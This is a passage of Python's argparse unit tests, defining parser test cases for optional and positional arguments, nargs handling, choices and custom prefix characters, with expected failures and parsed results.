error = super(ErrorRaisingArgumentParser, self).error
return stderr_to_parser_error(error, *args, **kwargs)
class ParserTesterMetaclass(type):
"""Adds parser tests using the class attributes.
Classes of this type should specify the following attributes:
argument_signatures -- a list of Sig objects which specify
the signatures of Argument objects to be created
failures -- a list of args lists that should cause the parser
to fail
successes -- a list of (initial_args, options, remaining_args) tuples
where initial_args specifies the string args to be parsed,
options is a dict that should match the vars() of the options
parsed out of initial_args, and remaining_args should be any
remaining unparsed arguments
"""
def __init__(cls, name, bases, bodydict):
if name == 'ParserTestCase':
return
# default parser signature is empty
if not hasattr(cls, 'parser_signature'):
cls.parser_signature = Sig()
if not hasattr(cls, 'parser_class'):
cls.parser_class = ErrorRaisingArgumentParser
# ---------------------------------------
# functions for adding optional arguments
# ---------------------------------------
def no_groups(parser, argument_signatures):
"""Add all arguments directly to the parser"""
for sig in argument_signatures:
parser.add_argument(*sig.args, **sig.kwargs)
def one_group(parser, argument_signatures):
"""Add all arguments under a single group in the parser"""
group = parser.add_argument_group('foo')
for sig in argument_signatures:
group.add_argument(*sig.args, **sig.kwargs)
def many_groups(parser, argument_signatures):
"""Add each argument in its own group to the parser"""
for i, sig in enumerate(argument_signatures):
group = parser.add_argument_group('foo:%i' % i)
group.add_argument(*sig.args, **sig.kwargs)
# --------------------------
# functions for parsing args
# --------------------------
def listargs(parser, args):
"""Parse the args by passing in a list"""
return parser.parse_args(args)
def sysargs(parser, args):
"""Parse the args by defaulting to sys.argv"""
old_sys_argv = sys.argv
sys.argv = [old_sys_argv[0]] + args
try:
return parser.parse_args()
finally:
sys.argv = old_sys_argv
# class that holds the combination of one optional argument
# addition method and one arg parsing method
class AddTests(object):
def __init__(self, tester_cls, add_arguments, parse_args):
self._add_arguments = add_arguments
self._parse_args = parse_args
add_arguments_name = self._add_arguments.__name__
parse_args_name = self._parse_args.__name__
for test_func in [self.test_failures, self.test_successes]:
func_name = test_func.__name__
names = func_name, add_arguments_name, parse_args_name
test_name = '_'.join(names)
def wrapper(self, test_func=test_func):
test_func(self)
try:
wrapper.__name__ = test_name
except TypeError:
pass
setattr(tester_cls, test_name, wrapper)
def _get_parser(self, tester):
args = tester.parser_signature.args
kwargs = tester.parser_signature.kwargs
parser = tester.parser_class(*args, **kwargs)
self._add_arguments(parser, tester.argument_signatures)
return parser
def test_failures(self, tester):
parser = self._get_parser(tester)
for args_str in tester.failures:
args = args_str.split()
raises = tester.assertRaises
raises(ArgumentParserError, parser.parse_args, args)
def test_successes(self, tester):
parser = self._get_parser(tester)
for args, expected_ns in tester.successes:
if isinstance(args, str):
args = args.split()
result_ns = self._parse_args(parser, args)
tester.assertEqual(expected_ns, result_ns)
# add tests for each combination of an optionals adding method
# and an arg parsing method
for add_arguments in [no_groups, one_group, many_groups]:
for parse_args in [listargs, sysargs]:
AddTests(cls, add_arguments, parse_args)
bases = TestCase,
ParserTestCase = ParserTesterMetaclass('ParserTestCase', bases, {})
# ===============
# Optionals tests
# ===============
class TestOptionalsSingleDash(ParserTestCase):
"""Test an Optional with a single-dash option string"""
argument_signatures = [Sig('-x')]
failures = ['-x', 'a', '--foo', '-x --foo', '-x -y']
successes = [
('', NS(x=None)),
('-x a', NS(x='a')),
('-xa', NS(x='a')),
('-x -1', NS(x='-1')),
('-x-1', NS(x='-1')),
]
class TestOptionalsSingleDashCombined(ParserTestCase):
"""Test an Optional with a single-dash option string"""
argument_signatures = [
Sig('-x', action='store_true'),
Sig('-yyy', action='store_const', const=42),
Sig('-z'),
]
failures = ['a', '--foo', '-xa', '-x --foo', '-x -z', '-z -x',
'-yx', '-yz a', '-yyyx', '-yyyza', '-xyza']
successes = [
('', NS(x=False, yyy=None, z=None)),
('-x', NS(x=True, yyy=None, z=None)),
('-za', NS(x=False, yyy=None, z='a')),
('-z a', NS(x=False, yyy=None, z='a')),
('-xza', NS(x=True, yyy=None, z='a')),
('-xz a', NS(x=True, yyy=None, z='a')),
('-x -za', NS(x=True, yyy=None, z='a')),
('-x -z a', NS(x=True, yyy=None, z='a')),
('-y', NS(x=False, yyy=42, z=None)),
('-yyy', NS(x=False, yyy=42, z=None)),
('-x -yyy -za', NS(x=True, yyy=42, z='a')),
('-x -yyy -z a', NS(x=True, yyy=42, z='a')),
]
class TestOptionalsSingleDashLong(ParserTestCase):
"""Test an Optional with a multi-character single-dash option string"""
argument_signatures = [Sig('-foo')]
failures = ['-foo', 'a', '--foo', '-foo --foo', '-foo -y', '-fooa']
successes = [
('', NS(foo=None)),
('-foo a', NS(foo='a')),
('-foo -1', NS(foo='-1')),
('-fo a', NS(foo='a')),
('-f a', NS(foo='a')),
]
class TestOptionalsSingleDashSubsetAmbiguous(ParserTestCase):
"""Test Optionals where option strings are subsets of each other"""
argument_signatures = [Sig('-f'), Sig('-foobar'), Sig('-foorab')]
failures = ['-f', '-foo', '-fo', '-foo b', '-foob', '-fooba', '-foora']
successes = [
('', NS(f=None, foobar=None, foorab=None)),
('-f a', NS(f='a', foobar=None, foorab=None)),
('-fa', NS(f='a', foobar=None, foorab=None)),
('-foa', NS(f='oa', foobar=None, foorab=None)),
('-fooa', NS(f='ooa', foobar=None, foorab=None)),
('-foobar a', NS(f=None, foobar='a', foorab=None)),
('-foorab a', NS(f=None, foobar=None, foorab='a')),
]
class TestOptionalsSingleDashAmbiguous(ParserTestCase):
"""Test Optionals that partially match but are not subsets"""
argument_signatures = [Sig('-foobar'), Sig('-foorab')]
failures = ['-f', '-f a', '-fa', '-foa', '-foo', '-fo', '-foo b']
successes = [
('', NS(foobar=None, foorab=None)),
('-foob a', NS(foobar='a', foorab=None)),
('-foor a', NS(foobar=None, foorab='a')),
('-fooba a', NS(foobar='a', foorab=None)),
('-foora a', NS(foobar=None, foorab='a')),
('-foobar a', NS(foobar='a', foorab=None)),
('-foorab a', NS(foobar=None, foorab='a')),
]
class TestOptionalsNumeric(ParserTestCase):
"""Test an Optional with a short opt string"""
argument_signatures = [Sig('-1', dest='one')]
failures = ['-1', 'a', '-1 --foo', '-1 -y', '-1 -1', '-1 -2']
successes = [
('', NS(one=None)),
('-1 a', NS(one='a')),
('-1a', NS(one='a')),
('-1-2', NS(one='-2')),
]
class TestOptionalsDoubleDash(ParserTestCase):
"""Test an Optional with a double-dash option string"""
argument_signatures = [Sig('--foo')]
failures = ['--foo', '-f', '-f a', 'a', '--foo -x', '--foo --bar']
successes = [
('', NS(foo=None)),
('--foo a', NS(foo='a')),
('--foo=a', NS(foo='a')),
('--foo -2.5', NS(foo='-2.5')),
('--foo=-2.5', NS(foo='-2.5')),
]
class TestOptionalsDoubleDashPartialMatch(ParserTestCase):
"""Tests partial matching with a double-dash option string"""
argument_signatures = [
Sig('--badger', action='store_true'),
Sig('--bat'),
]
failures = ['--bar', '--b', '--ba', '--b=2', '--ba=4', '--badge 5']
successes = [
('', NS(badger=False, bat=None)),
('--bat X', NS(badger=False, bat='X')),
('--bad', NS(badger=True, bat=None)),
('--badg', NS(badger=True, bat=None)),
('--badge', NS(badger=True, bat=None)),
('--badger', NS(badger=True, bat=None)),
]
class TestOptionalsDoubleDashPrefixMatch(ParserTestCase):
"""Tests when one double-dash option string is a prefix of another"""
argument_signatures = [
Sig('--badger', action='store_true'),
Sig('--ba'),
]
failures = ['--bar', '--b', '--ba', '--b=2', '--badge 5']
successes = [
('', NS(badger=False, ba=None)),
('--ba X', NS(badger=False, ba='X')),
('--ba=X', NS(badger=False, ba='X')),
('--bad', NS(badger=True, ba=None)),
('--badg', NS(badger=True, ba=None)),
('--badge', NS(badger=True, ba=None)),
('--badger', NS(badger=True, ba=None)),
]
class TestOptionalsSingleDoubleDash(ParserTestCase):
"""Test an Optional with single- and double-dash option strings"""
argument_signatures = [
Sig('-f', action='store_true'),
Sig('--bar'),
Sig('-baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-fbaz', '-bazf', '-b B', 'B']
successes = [
('', NS(f=False, bar=None, baz=None)),
('-f', NS(f=True, bar=None, baz=None)),
('--ba B', NS(f=False, bar='B', baz=None)),
('-f --bar B', NS(f=True, bar='B', baz=None)),
('-f -b', NS(f=True, bar=None, baz=42)),
('-ba -f', NS(f=True, bar=None, baz=42)),
]
class TestOptionalsAlternatePrefixChars(ParserTestCase):
"""Test an Optional with option strings with custom prefixes"""
parser_signature = Sig(prefix_chars='+:/', add_help=False)
argument_signatures = [
Sig('+f', action='store_true'),
Sig('::bar'),
Sig('/baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-b B', 'B', '-f', '--bar B', '-baz', '-h', '--help', '+h', '::help', '/help']
successes = [
('', NS(f=False, bar=None, baz=None)),
('+f', NS(f=True, bar=None, baz=None)),
('::ba B', NS(f=False, bar='B', baz=None)),
('+f ::bar B', NS(f=True, bar='B', baz=None)),
('+f /b', NS(f=True, bar=None, baz=42)),
('/ba +f', NS(f=True, bar=None, baz=42)),
]
class TestOptionalsAlternatePrefixCharsAddedHelp(ParserTestCase):
"""When ``-`` not in prefix_chars, default operators created for help
should use the prefix_chars in use rather than - or --
http://bugs.python.org/issue9444"""
parser_signature = Sig(prefix_chars='+:/', add_help=True)
argument_signatures = [
Sig('+f', action='store_true'),
Sig('::bar'),
Sig('/baz', action='store_const', const=42),
]
failures = ['--bar', '-fbar', '-b B', 'B', '-f', '--bar B', '-baz']
successes = [
('', NS(f=False, bar=None, baz=None)),
('+f', NS(f=True, bar=None, baz=None)),
('::ba B', NS(f=False, bar='B', baz=None)),
('+f ::bar B', NS(f=True, bar='B', baz=None)),
('+f /b', NS(f=True, bar=None, baz=42)),
('/ba +f', NS(f=True, bar=None, baz=42))
]
class TestOptionalsAlternatePrefixCharsMultipleShortArgs(ParserTestCase):
"""Verify that Optionals must be called with their defined prefixes"""
parser_signature = Sig(prefix_chars='+-', add_help=False)
argument_signatures = [
Sig('-x', action='store_true'),
Sig('+y', action='store_true'),
Sig('+z', action='store_true'),
]
failures = ['-w',
'-xyz',
'+x',
'-y',
'+xyz',
]
successes = [
('', NS(x=False, y=False, z=False)),
('-x', NS(x=True, y=False, z=False)),
('+y -x', NS(x=True, y=True, z=False)),
('+yz -x', NS(x=True, y=True, z=True)),
]
class TestOptionalsShortLong(ParserTestCase):
"""Test a combination of single- and double-dash option strings"""
argument_signatures = [
Sig('-v', '--verbose', '-n', '--noisy', action='store_true'),
]
failures = ['--x --verbose', '-N', 'a', '-v x']
successes = [
('', NS(verbose=False)),
('-v', NS(verbose=True)),
('--verbose', NS(verbose=True)),
('-n', NS(verbose=True)),
('--noisy', NS(verbose=True)),
]
class TestOptionalsDest(ParserTestCase):
"""Tests various means of setting destination"""
argument_signatures = [Sig('--foo-bar'), Sig('--baz', dest='zabbaz')]
failures = ['a']
successes = [
('--foo-bar f', NS(foo_bar='f', zabbaz=None)),
('--baz g', NS(foo_bar=None, zabbaz='g')),
('--foo-bar h --baz i', NS(foo_bar='h', zabbaz='i')),
('--baz j --foo-bar k', NS(foo_bar='k', zabbaz='j')),
]
class TestOptionalsDefault(ParserTestCase):
"""Tests specifying a default for an Optional"""
argument_signatures = [Sig('-x'), Sig('-y', default=42)]
failures = ['a']
successes = [
('', NS(x=None, y=42)),
('-xx', NS(x='x', y=42)),
('-yy', NS(x=None, y='y')),
]
class TestOptionalsNargsDefault(ParserTestCase):
"""Tests not specifying the number of args for an Optional"""
argument_signatures = [Sig('-x')]
failures = ['a', '-x']
successes = [
('', NS(x=None)),
('-x a', NS(x='a')),
]
class TestOptionalsNargs1(ParserTestCase):
"""Tests specifying the 1 arg for an Optional"""
argument_signatures = [Sig('-x', nargs=1)]
failures = ['a', '-x']
successes = [
('', NS(x=None)),
('-x a', NS(x=['a'])),
]
class TestOptionalsNargs3(ParserTestCase):
"""Tests specifying the 3 args for an Optional"""
argument_signatures = [Sig('-x', nargs=3)]
failures = ['a', '-x', '-x a', '-x a b', 'a -x', 'a -x b']
successes = [
('', NS(x=None)),
('-x a b c', NS(x=['a', 'b', 'c'])),
]
class TestOptionalsNargsOptional(ParserTestCase):
"""Tests specifying an Optional arg for an Optional"""
argument_signatures = [
Sig('-w', nargs='?'),
Sig('-x', nargs='?', const=42),
Sig('-y', nargs='?', default='spam'),
Sig('-z', nargs='?', type=int, const='42', default='84'),
]
failures = ['2']
successes = [
('', NS(w=None, x=None, y='spam', z=84)),
('-w', NS(w=None, x=None, y='spam', z=84)),
('-w 2', NS(w='2', x=None, y='spam', z=84)),
('-x', NS(w=None, x=42, y='spam', z=84)),
('-x 2', NS(w=None, x='2', y='spam', z=84)),
('-y', NS(w=None, x=None, y=None, z=84)),
('-y 2', NS(w=None, x=None, y='2', z=84)),
('-z', NS(w=None, x=None, y='spam', z=42)),
('-z 2', NS(w=None, x=None, y='spam', z=2)),
]
class TestOptionalsNargsZeroOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts zero or more"""
argument_signatures = [
Sig('-x', nargs='*'),
Sig('-y', nargs='*', default='spam'),
]
failures = ['a']
successes = [
('', NS(x=None, y='spam')),
('-x', NS(x=[], y='spam')),
('-x a', NS(x=['a'], y='spam')),
('-x a b', NS(x=['a', 'b'], y='spam')),
('-y', NS(x=None, y=[])),
('-y a', NS(x=None, y=['a'])),
('-y a b', NS(x=None, y=['a', 'b'])),
]
class TestOptionalsNargsOneOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts one or more"""
argument_signatures = [
Sig('-x', nargs='+'),
Sig('-y', nargs='+', default='spam'),
]
failures = ['a', '-x', '-y', 'a -x', 'a -y b']
successes = [
('', NS(x=None, y='spam')),
('-x a', NS(x=['a'], y='spam')),
('-x a b', NS(x=['a', 'b'], y='spam')),
('-y a', NS(x=None, y=['a'])),
('-y a b', NS(x=None, y=['a', 'b'])),
]
class TestOptionalsChoices(ParserTestCase):
"""Tests specifying the choices for an Optional"""
argument_signatures = [
Sig('-f', choices='abc'),
Sig('-g', type=int, choices=range(5))]
failures = ['a', '-f d', '-fad', '-ga', '-g 6']
successes = [
('', NS(f=None, g=None)),
('-f a', NS(f='a', g=None)),
('-f c', NS(f='c', g=None)),
('-g 0', NS(f=None, g=0)),
('-g 03', NS(f=None, g=3)),
('-fb -g4', NS(f='b', g=4)),
]
class TestOptionalsRequired(ParserTestCase):
"""Tests the an optional action that is required"""
argument_signatures = [
Sig('-x', type=int, required=True),
]
failures = ['a', '']
successes = [
('-x 1', NS(x=1)),
('-x42', NS(x=42)),
]
class TestOptionalsActionStore(ParserTestCase):
"""Tests the store action for an Optional"""
argument_signatures = [Sig('-x', action='store')]
failures = ['a', 'a -x']
successes = [
('', NS(x=None)),
('-xfoo', NS(x='foo')),
]
class TestOptionalsActionStoreConst(ParserTestCase):
"""Tests the store_const action for an Optional"""
argument_signatures = [Sig('-y', action='store_const', const=object)]
failures = ['a']
successes = [
('', NS(y=None)),
('-y', NS(y=object)),
]
class TestOptionalsActionStoreFalse(ParserTestCase):
"""Tests the store_false action for an Optional"""
argument_signatures = [Sig('-z', action='store_false')]
failures = ['a', '-za', '-z a']
successes = [
('', NS(z=True)),
('-z', NS(z=False)),
]
class TestOptionalsActionStoreTrue(ParserTestCase):
"""Tests the store_true action for an Optional"""
argument_signatures = [Sig('--apple', action='store_true')]
failures = ['a', '--apple=b', '--apple b']
successes = [
('', NS(apple=False)),
('--apple', NS(apple=True)),
]
class TestOptionalsActionAppend(ParserTestCase):
"""Tests the append action for an Optional"""
argument_signatures = [Sig('--baz', action='append')]
failures = ['a', '--baz', 'a --baz', '--baz a b']
successes = [
('', NS(baz=None)),
('--baz a', NS(baz=['a'])),
('--baz a --baz b', NS(baz=['a', 'b'])),
]
class TestOptionalsActionAppendWithDefault(ParserTestCase):
"""Tests the append action for an Optional"""
argument_signatures = [Sig('--baz', action='append', default=['X'])]
failures = ['a', '--baz', 'a --baz', '--baz a b']
successes = [
('', NS(baz=['X'])),
('--baz a', NS(baz=['X', 'a'])),
('--baz a --baz b', NS(baz=['X', 'a', 'b'])),
]
class TestOptionalsActionAppendConst(ParserTestCase):
"""Tests the append_const action for an Optional"""
argument_signatures = [
Sig('-b', action='append_const', const=Exception),
Sig('-c', action='append', dest='b'),
]
failures = ['a', '-c', 'a -c', '-bx', '-b x']
successes = [
('', NS(b=None)),
('-b', NS(b=[Exception])),
('-b -cx -b -cyz', NS(b=[Exception, 'x', Exception, 'yz'])),
]
class TestOptionalsActionAppendConstWithDefault(ParserTestCase):
"""Tests the append_const action for an Optional"""
argument_signatures = [
Sig('-b', action='append_const', const=Exception, default=['X']),
Sig('-c', action='append', dest='b'),
]
failures = ['a', '-c', 'a -c', '-bx', '-b x']
successes = [
('', NS(b=['X'])),
('-b', NS(b=['X', Exception])),
('-b -cx -b -cyz', NS(b=['X', Exception, 'x', Exception, 'yz'])),
]
class TestOptionalsActionCount(ParserTestCase):
"""Tests the count action for an Optional"""
argument_signatures = [Sig('-x', action='count')]
failures = ['a', '-x a', '-x b', '-x a -x b']
successes = [
('', NS(x=None)),
('-x', NS(x=1)),
]
# ================
# Positional tests
# ================
class TestPositionalsNargsNone(ParserTestCase):
"""Test a Positional that doesn't specify nargs"""
argument_signatures = [Sig('foo')]
failures = ['', '-x', 'a b']
successes = [
('a', NS(foo='a')),
]
class TestPositionalsNargs1(ParserTestCase):
"""Test a Positional that specifies an nargs of 1"""
argument_signatures = [Sig('foo', nargs=1)]
failures = ['', '-x', 'a b']
successes = [
('a', NS(foo=['a'])),
]
class TestPositionalsNargs2(ParserTestCase):
"""Test a Positional that specifies an nargs of 2"""
argument_signatures = [Sig('foo', nargs=2)]
failures = ['', 'a', '-x', 'a b c']
successes = [
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsZeroOrMore(ParserTestCase):
"""Test a Positional that specifies unlimited nargs"""
argument_signatures = [Sig('foo', nargs='*')]
failures = ['-x']
successes = [
('', NS(foo=[])),
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsZeroOrMoreDefault(ParserTestCase):
"""Test a Positional that specifies unlimited nargs and a default"""
argument_signatures = [Sig('foo', nargs='*', default='bar')]
failures = ['-x']
successes = [
('', NS(foo='bar')),
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsOneOrMore(ParserTestCase):
"""Test a Positional that specifies one or more nargs"""
argument_signatures = [Sig('foo', nargs='+')]
failures = ['', '-x']
successes = [
('a', NS(foo=['a'])),
('a b', NS(foo=['a', 'b'])),
]
class TestPositionalsNargsOptional(ParserTestCase):
"""Tests an Optional Positional"""
argument_signatures = [Sig('foo', nargs='?')]
failures = ['-x', 'a b']
successes = [
('', NS(foo=None)),
('a', NS(foo='a')),
]
class TestPositionalsNargsOptionalDefault(ParserTestCase):
"""Tests an Optional Positional with a default value"""
argument_signatures = [Sig('foo', nargs='?', default=42)]
failures = ['-x', 'a b']
successes = [
('', NS(foo=42)),
('a', NS(foo='a')),
]
class TestPositionalsNargsOptionalConvertedDefault(ParserTestCase):
"""Tests an Optional Positional with a default value
that needs to be converted to the appropriate type.
"""
argument_signatures = [
Sig('foo', nargs='?', type=int, default='42'),
]
failures = ['-x', 'a b', '1 2']
successes = [
('', NS(foo=42)),
('1', NS(foo=1)),
]
class TestPositionalsNargsNoneNone(ParserTestCase):
"""Test two Positionals that don't specify nargs"""
argument_signatures = [Sig('foo'), Sig('bar')]
failures = ['', '-x', 'a', 'a b c']
successes = [
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsNone1(ParserTestCase):
"""Test a Positional with no nargs followed by one with 1"""
argument_signatures = [Sig('foo'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a', 'a b c']
successes = [
('a b', NS(foo='a', bar=['b'])),
]
class TestPositionalsNargs2None(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar')]
failures = ['', '--foo', 'a', 'a b', 'a b c d']
successes = [
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsNoneZeroOrMore(ParserTestCase):
"""Test a Positional with no nargs followed by one with unlimited"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='*')]
failures = ['', '--foo']
successes = [
('a', NS(foo='a', bar=[])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsNoneOneOrMore(ParserTestCase):
"""Test a Positional with no nargs followed by one with one or more"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='+')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsNoneOptional(ParserTestCase):
"""Test a Positional with no nargs followed by one with an Optional"""
argument_signatures = [Sig('foo'), Sig('bar', nargs='?')]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo='a', bar=None)),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsZeroOrMoreNone(ParserTestCase):
"""Test a Positional with unlimited nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='*'), Sig('bar')]
failures = ['', '--foo']
successes = [
('a', NS(foo=[], bar='a')),
('a b', NS(foo=['a'], bar='b')),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsOneOrMoreNone(ParserTestCase):
"""Test a Positional with one or more nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='+'), Sig('bar')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a'], bar='b')),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsOptionalNone(ParserTestCase):
"""Test a Positional with an Optional nargs followed by one with none"""
argument_signatures = [Sig('foo', nargs='?', default=42), Sig('bar')]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo=42, bar='a')),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargs2ZeroOrMore(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with unlimited"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='*')]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a', 'b'], bar=[])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargs2OneOrMore(ParserTestCase):
"""Test a Positional with 2 nargs followed by one with one or more"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='+')]
failures = ['', '--foo', 'a', 'a b']
successes = [
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargs2Optional(ParserTestCase):
"""Test a Positional with 2 nargs followed by one optional"""
argument_signatures = [Sig('foo', nargs=2), Sig('bar', nargs='?')]
failures = ['', '--foo', 'a', 'a b c d']
successes = [
('a b', NS(foo=['a', 'b'], bar=None)),
('a b c', NS(foo=['a', 'b'], bar='c')),
]
class TestPositionalsNargsZeroOrMore1(ParserTestCase):
"""Test a Positional with unlimited nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='*'), Sig('bar', nargs=1)]
failures = ['', '--foo', ]
successes = [
('a', NS(foo=[], bar=['a'])),
('a b', NS(foo=['a'], bar=['b'])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargsOneOrMore1(ParserTestCase):
"""Test a Positional with one or more nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='+'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo=['a'], bar=['b'])),
('a b c', NS(foo=['a', 'b'], bar=['c'])),
]
class TestPositionalsNargsOptional1(ParserTestCase):
"""Test a Positional with an Optional nargs followed by one with 1"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs=1)]
failures = ['', '--foo', 'a b c']
successes = [
('a', NS(foo=None, bar=['a'])),
('a b', NS(foo='a', bar=['b'])),
]
class TestPositionalsNargsNoneZeroOrMore1(ParserTestCase):
"""Test three Positionals: no nargs, unlimited nargs and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='*'),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=[], baz=['b'])),
('a b c', NS(foo='a', bar=['b'], baz=['c'])),
]
class TestPositionalsNargsNoneOneOrMore1(ParserTestCase):
"""Test three Positionals: no nargs, one or more nargs and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='+'),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a', 'b']
successes = [
('a b c', NS(foo='a', bar=['b'], baz=['c'])),
('a b c d', NS(foo='a', bar=['b', 'c'], baz=['d'])),
]
class TestPositionalsNargsNoneOptional1(ParserTestCase):
"""Test three Positionals: no nargs, optional narg and 1 nargs"""
argument_signatures = [
Sig('foo'),
Sig('bar', nargs='?', default=0.625),
Sig('baz', nargs=1),
]
failures = ['', '--foo', 'a']
successes = [
('a b', NS(foo='a', bar=0.625, baz=['b'])),
('a b c', NS(foo='a', bar='b', baz=['c'])),
]
class TestPositionalsNargsOptionalOptional(ParserTestCase):
"""Test two optional nargs"""
argument_signatures = [
Sig('foo', nargs='?'),
Sig('bar', nargs='?', default=42),
]
failures = ['--foo', 'a b c']
successes = [
('', NS(foo=None, bar=42)),
('a', NS(foo='a', bar=42)),
('a b', NS(foo='a', bar='b')),
]
class TestPositionalsNargsOptionalZeroOrMore(ParserTestCase):
"""Test an Optional narg followed by unlimited nargs"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs='*')]
failures = ['--foo']
successes = [
('', NS(foo=None, bar=[])),
('a', NS(foo='a', bar=[])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsNargsOptionalOneOrMore(ParserTestCase):
"""Test an Optional narg followed by one or more nargs"""
argument_signatures = [Sig('foo', nargs='?'), Sig('bar', nargs='+')]
failures = ['', '--foo']
successes = [
('a', NS(foo=None, bar=['a'])),
('a b', NS(foo='a', bar=['b'])),
('a b c', NS(foo='a', bar=['b', 'c'])),
]
class TestPositionalsChoicesString(ParserTestCase):
"""Test a set of single-character choices"""
argument_signatures = [Sig('spam', choices=set('abcdefg'))]
failures = ['', '--foo', 'h', '42', 'ef']
successes = [
('a', NS(spam='a')),
('g', NS(spam='g')),
]
class TestPositionalsChoicesInt(ParserTestCase):
"""Test a set of integer choices"""
argument_signatures = [Sig('spam', type=int, choices=range(20))]
failures = ['', '--foo', 'h', '42', 'ef']
successes = [
('4', NS(spam=4)),
('15', NS(spam=15)),
]
class TestPositionalsActionAppend(ParserTestCase):
"""Test the 'append' action"""
argument_signatures = [
Sig('spam', action='append'),
Sig('spam', action='append', nargs=2),
]
failures = ['', '--foo', 'a', 'a b', 'a b c d']
successes = [
('a b c', NS(spam=['a', ['b', 'c']])),
]
# ========================================
# Combined optionals and positionals tests
# ========================================
class TestOptionalsNumericAndPositionals(ParserTestCase):
"""Tests negative number args when numeric options are present"""
argument_signatures = [
Sig('x', nargs='?'),
Sig('-4', dest='y', action='store_true'),
]
failures = ['-2', '-315']
successes = [
('', NS(x=None, y=False)),
('a', NS(x='a', y=False)),
('-4', NS(x=None, y=True)),
('-4 a', NS(x='a', y=True)),
]
class TestOptionalsAlmostNumericAndPositionals(ParserTestCase):
"""Tests negative number args when almost numeric options are present"""
argument_signatures = [
Sig('x', nargs='?'),
Sig('-k4', dest='y', action='store_true'),
]
failures = ['-k3']
successes = [
('', NS(x=None, y=False)),
('-2', NS(x='-2', y=False)),
('a', NS(x='a', y=False)),
('-k4', NS(x=None, y=True)),
('-k4 a', NS(x='a', y=True)),
]
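# Illustrative sketch of the behaviour exercised above (assumed usage): a
# token such as '-2' is treated as a positional value only when none of the
# parser's option strings themselves look like negative numbers, e.g.
#
#     parser = argparse.ArgumentParser()
#     parser.add_argument('x', nargs='?')
#     parser.parse_args(['-2'])        # -> Namespace(x='-2')
#
# whereas TestOptionalsNumericAndPositionals above registers '-4', so there
# '-2' is rejected as an unknown option instead.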
class TestEmptyAndSpaceContainingArguments(ParserTestCase):
argument_signatures = [
Sig('x', nargs='?'),
Sig('-y', '--yyy', dest='y'),
]
failures = ['-y']
successes = [
([''], NS(x='', y=None)),
(['a badger'], NS(x='a badger', y=None)),
(['-a badger'], NS(x='-a badger', y=None)),
(['-y', ''], NS(x=None, y='')),
(['-y', 'a badger'], NS(x=None, y='a badger')),
(['-y', '-a badger'], NS(x=None, y='-a badger')),
(['--yyy=a badger'], NS(x=None, y='a badger')),
(['--yyy=-a badger'], NS(x=None, y='-a badger')),
]
class TestPrefixCharacterOnlyArguments(ParserTestCase):
parser_signature = Sig(prefix_chars='-+')
argument_signatures = [
Sig('-', dest='x', nargs='?', const='badger'),
Sig('+', dest='y', type=int, default=42),
Sig('-+-', dest='z', action='store_true'),
]
failures = ['-y', '+ -']
successes = [
('', NS(x=None, y=42, z=False)),
('-', NS(x='badger', y=42, z=False)),
('- X', NS(x='X', y=42, z=False)),
('+ -3', NS(x=None, y=-3, z=False)),
('-+-', NS(x=None, y=42, z=True)),
('- ===', NS(x='===', y=42, z=False)),
]
class TestNargsZeroOrMore(ParserTestCase):
"""Tests specifying an args for an Optional that accepts zero or more"""
argument_signatures = [Sig('-x', nargs='*'), Sig('y', nargs='*')]
failures = []
successes = [
('', NS(x=None, y=[])),
('-x', NS(x=[], y=[])),
('-x a', NS(x=['a'], y=[])),
('-x a -- b', NS(x=['a'], y=['b'])),
('a', NS(x=None, y=['a'])),
('a -x', NS(x=[], y=['a'])),
('a -x b', NS(x=['b'], y=['a'])),
]
class TestNargsRemainder(ParserTestCase):
"""Tests specifying a positional with nargs=REMAINDER"""
argument_signatures = [Sig('x'), Sig('y', nargs='...'), Sig('-z')]
failures = ['', '-z', '-z Z']
successes = [
('X', NS(x='X', y=[], z=None)),
